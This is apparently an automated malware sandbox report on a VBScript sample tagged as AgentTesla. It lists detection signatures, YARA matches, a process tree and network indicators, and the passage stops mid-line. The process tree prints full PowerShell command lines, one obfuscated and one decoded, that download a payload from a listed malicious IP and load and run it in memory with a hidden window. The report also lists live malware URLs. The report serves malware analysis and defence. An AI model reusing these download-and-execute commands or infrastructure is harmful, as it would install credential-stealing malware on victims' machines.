Windows Analysis Report
_COMPRA_.VBS

Overview

General Information

Sample Name: _COMPRA_.VBS
Analysis ID: 626602
MD5: ebab128121287858484a652d8918a5da
SHA1: 9cb2dcf0cf009633dc615bee5f1e70ef3b335208
SHA256: 50761c08dfd1c70cf7406b9bd3ad99dce355f383a0bedacdc27b39cd06b3ed6f
Tags: agenttesla

Detection

Score: 88
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Antivirus detection for URL or domain
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Yara detected Generic Downloader
Downloads files with wrong headers with respect to MIME Content-Type
Wscript starts Powershell (via cmd or directly)
Suspicious powershell command line found
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Queries the volume information (name, serial number etc) of a device
Yara signature match
Java / VBScript file with very long strings (likely obfuscated code)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Internet Provider seen in connection with other malware
Detected potential crypto function
HTTP GET or POST without a user agent
Creates a process in suspended mode (likely to inject code)
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)
Contains long sleeps (>= 3 min)
Enables debug privileges

Classification

  • System is w10x64
  • wscript.exe (PID: 6256 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\Desktop\_COMPRA_.VBS" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
    • powershell.exe (PID: 6388 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $iUqm = 'WwBCAHkAdABlAFsAXQBdACAAJABEAEwATAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAG???ANgA0AFMAdAByAGkAbgBnACgAKABOAG???AdwAtAE8AYgBqAG???AYwB0ACAATgBlAHQALgBXAG???AYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwADoALwAvADIAMAAuADEAMAA2AC4AMgAzADIALgA0AC8AZABsAGwALwBuAG???AdwAuAHAAZABmACcAKQApADsAWwBTAHkAcwB0AG???AbQAuAEEAcABwAEQAbwBtAGEAaQBuAF0AOgA6AEMAdQByAHIAZQBuAHQARABvAG0AYQBpAG4ALgBMAG8AYQBkACgAJABEAEwATAApAC4ARwBlAHQAVAB5AHAAZQAoACcAZABkAHMAYwBmAEkAdgBxAGcAVwAuAEgAbwBOAFkAbABEAFIATwBMAFAAJwApAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAFIAdQBuACcAKQAuAEkAbgB2AG8AawBlACgAJABuAH???AbABsACwAIABbAG8AYgBqAG???AYwB0AFsAXQBdACAAKAAnAHQAeAB0AC4AaABnAH???AdQByAHQAdAAvADEANwAxAC4AOAAxAC4AMwAzADEALgA1ADkAMQAvAC8AOgBwAHQAdABoACcAKQApAA==';$OWjuxD = [System.Text.Encoding]::Unicode.GetString( [System.Convert]::FromBase64String( $iUqm.replace('???','U') ) );powershell.exe -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command $OWjuxD MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 6396 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6520 cmdline: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -ExecutionPolicy Bypss -NoProfile -Command "[Byte[]] $DLL = [System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('http://20.106.232.4/dll/new.pdf'));[System.AppDomain]::CurrentDomain.Load($DLL).GetType('ddscfIvqgW.HoNYlDROLP').GetMethod('Run').Invoke($null, [object[]] ('txt.hguurtt/171.81.331.591//:ptth')) MD5: 95000560239032BC68B4C2FDFCDEF913)
        • powershell.exe (PID: 6728 cmdline: powershell Copy-Item -Path C:\Windows\Temp\*.vbs -Destination C:\ProgramData\Done.vbs MD5: 95000560239032BC68B4C2FDFCDEF913)
  • cleanup
No configs have been found
Source: dump.pcap; Rule: SUSP_Reversed_Base64_Encoded_EXE; Description: Detects a base64 encoded executable with reversed characters; Author: Florian Roth
  • 0x14f8f9:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Source: 00000003.00000002.341381226.0000020DBAA07000.00000004.00000800.00020000.00000000.sdmp; Rule: SUSP_Reversed_Base64_Encoded_EXE; Description: Detects a base64 encoded executable with reversed characters; Author: Florian Roth
  • 0x1accc:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Source: 00000003.00000002.341350296.0000020DBA9C4000.00000004.00000800.00020000.00000000.sdmp; Rule: SUSP_Reversed_Base64_Encoded_EXE; Description: Detects a base64 encoded executable with reversed characters; Author: Florian Roth
  • 0x2dc94:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Source: 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmp; Rule: SUSP_Reversed_Base64_Encoded_EXE; Description: Detects a base64 encoded executable with reversed characters; Author: Florian Roth
  • 0x244139:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Source: Process Memory Space: powershell.exe PID: 6388; Rule: PowerShell_Susp_Parameter_Combo; Description: Detects PowerShell invocation with suspicious parameters; Author: Florian Roth
  • 0x130462:$sa2: -encodedCommand
  • 0x13048e:$sa2: -encodedCommand
  • 0x130be9:$sa2: -EncodedCommand
  • 0x13170a:$sa2: -EncodedCommand
  • 0x1317a5:$sa2: -encodedCommand
  • 0xae66:$sb3: -windowstyle hidden
  • 0xb0cc:$sb3: -windowstyle hidden
  • 0xf9af:$sb3: -windowstyle hidden
  • 0x104ca:$sb3: -windowstyle hidden
  • 0x10a85:$sb3: -windowstyle hidden
  • 0x50b1a:$sb3: -windowstyle hidden
  • 0x51304:$sb3: -windowstyle hidden
  • 0x6b07b:$sb3: -windowstyle hidden
  • 0x6b256:$sb3: -windowstyle hidden
  • 0x6b4af:$sb3: -windowstyle hidden
  • 0x6bab2:$sb3: -windowstyle hidden
  • 0x9eb43:$sb3: -windowstyle hidden
  • 0x9ed1e:$sb3: -windowstyle hidden
  • 0xd760c:$sb3: -windowstyle hidden
  • 0xd8885:$sb3: -windowstyle hidden
  • 0xd8a60:$sb3: -windowstyle hidden
Source: Process Memory Space: powershell.exe PID: 6388; Rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC; Description: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution; Author: ditekSHen
  • 0xae28:$b2: ::FromBase64String(
  • 0xaeed:$b2: ::FromBase64String(
  • 0xb08e:$b2: ::FromBase64String(
  • 0xf971:$b2: ::FromBase64String(
  • 0x1048c:$b2: ::FromBase64String(
  • 0x10a46:$b2: ::FromBase64String(
  • 0x50adc:$b2: ::FromBase64String(
  • 0x512c8:$b2: ::FromBase64String(
  • 0x5299c:$b2: ::FromBase64String(
  • 0x6b03f:$b2: ::FromBase64String(
  • 0x6b218:$b2: ::FromBase64String(
  • 0x6ba75:$b2: ::FromBase64String(
  • 0x9eb07:$b2: ::FromBase64String(
  • 0x9ece0:$b2: ::FromBase64String(
  • 0xa0e22:$b2: ::FromBase64String(
  • 0xd75ce:$b2: ::FromBase64String(
  • 0xd8849:$b2: ::FromBase64String(
  • 0xd8a22:$b2: ::FromBase64String(
  • 0xeff93:$b2: ::FromBase64String(
  • 0xf0459:$b2: ::FromBase64String(
  • 0xf124b:$b2: ::FromBase64String(
Source: 3.2.powershell.exe.20dab669c50.0.raw.unpack; Rule: SUSP_Reversed_Base64_Encoded_EXE; Description: Detects a base64 encoded executable with reversed characters; Author: Florian Roth
  • 0x17f4e9:$sh3: uUGZv1GIT9ERg4Wag4WdyBSZiBCdv5mbhNGItFmcn9mcwBycphGV
Source: 3.2.powershell.exe.20dab669c50.0.raw.unpack; Rule: JoeSecurity_GenericDownloader_1; Description: Yara detected Generic Downloader; Author: Joe Security
Source: 3.2.powershell.exe.20dab669c50.0.raw.unpack; Rule: MALWARE_Win_DLAgent09; Description: Detects known downloader agent; Author: ditekSHen
  • 0x1681ea:$h1: //:ptth
  • 0x16882e:$h1: //:ptth
  • 0x168892:$h1: //:ptth
  • 0x83a2:$s1: DownloadString
  • 0x8397:$s2: StrReverse
  • 0x83e4:$s3: FromBase64String
  • 0x834f:$s4: WebClient
No Sigma rule has matched
No Snort rule has matched

AV Detection

Source: _COMPRA_.VBS; Virustotal: Detection: 22%
Source: http://20.106.232.4/rumpe/newrumpe.pdf; Avira URL Cloud: Label: malware
Source: http://195.133.18.171; Avira URL Cloud: Label: malware
Source: http://20.106.232.4/dll/new.pdf; Avira URL Cloud: Label: malware
Source: http://20.106.232.4; Avira URL Cloud: Label: malware
Source: http://195.133.18.171/ttruugh.txt; Avira URL Cloud: Label: malware
Source: http://195.133.18.171; Virustotal: Detection: 17%
Source: Binary string: ddscfIvqgW.pdb; source: powershell.exe, 00000003.00000002.341706617.0000020DC2980000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe; File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows

Networking

Source: Yara match; File source: 3.2.powershell.exe.20dab669c50.0.raw.unpack, type: UNPACKEDPE
Source: http; Bad PDF prefix: HTTP/1.1 200 OK Date: Sat, 14 May 2022 13:21:51 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 12 May 2022 22:03:48 GMT ETag: "11aac-5ded7bb7a622a" Accept-Ranges: bytes Content-Length: 72364 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: application/pdf
Source: http; Bad PDF prefix: HTTP/1.1 200 OK Date: Sat, 14 May 2022 13:21:53 GMT Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.28 Last-Modified: Thu, 12 May 2022 22:01:31 GMT ETag: "1a220-5ded7b35b18e6" Accept-Ranges: bytes Content-Length: 107040 Content-Type: application/pdf
Source: Joe Sandbox View; ASN Name: MICROSOFT-CORP-MSN-AS-BLOCKUS
Source: global traffic; HTTP traffic detected: GET /dll/new.pdf HTTP/1.1 Host: 20.106.232.4 Connection: Keep-Alive
Source: global traffic; HTTP traffic detected: GET /rumpe/newrumpe.pdf HTTP/1.1 Host: 20.106.232.4
Source: Joe Sandbox View; IP Address: 195.133.18.171
Source: unknown; TCP traffic detected without corresponding DNS query: 20.106.232.4
Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://195.133.18.171
Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://195.133.18.171/ttruugh.txt
Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://195.133.18.171x
Source: powershell.exe, 00000003.00000002.337235213.0000020DAB591000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://20.106.232.4
Source: PowerShell_transcript.035347.PDp+ZyLV.20220514152147.txt.3.dr; String found in binary or memory: http://20.106.232.4/dll/new.pdf
Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://20.106.232.4/rumpe/newrumpe.pdf
Source: powershell.exe, 00000003.00000002.337261949.0000020DAB5A5000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://20.106.232.48
Source: powershell.exe, 00000003.00000002.337253428.0000020DAB59E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://20.106.232.4x
Source: powershell.exe, 00000001.00000002.349233739.0000015ED9E81000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.341945346.0000020DC2A3C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.305024899.000002427BBF7000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: powershell.exe, 00000006.00000002.305490212.000002427BD40000.00000004.00000020.00020000.00000000.sdmp; String found in binary or memory: http://crl.microq
Source: powershell.exe, 00000003.00000002.341142244.0000020DBA852000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.302980565.000002421006E000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000006.00000002.293300830.0000024200211000.00000004.00000800.00020000.00000000.sdmp; String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000001.00000002.346642450.0000015EC1C51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.332620182.0000020DAA7F1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.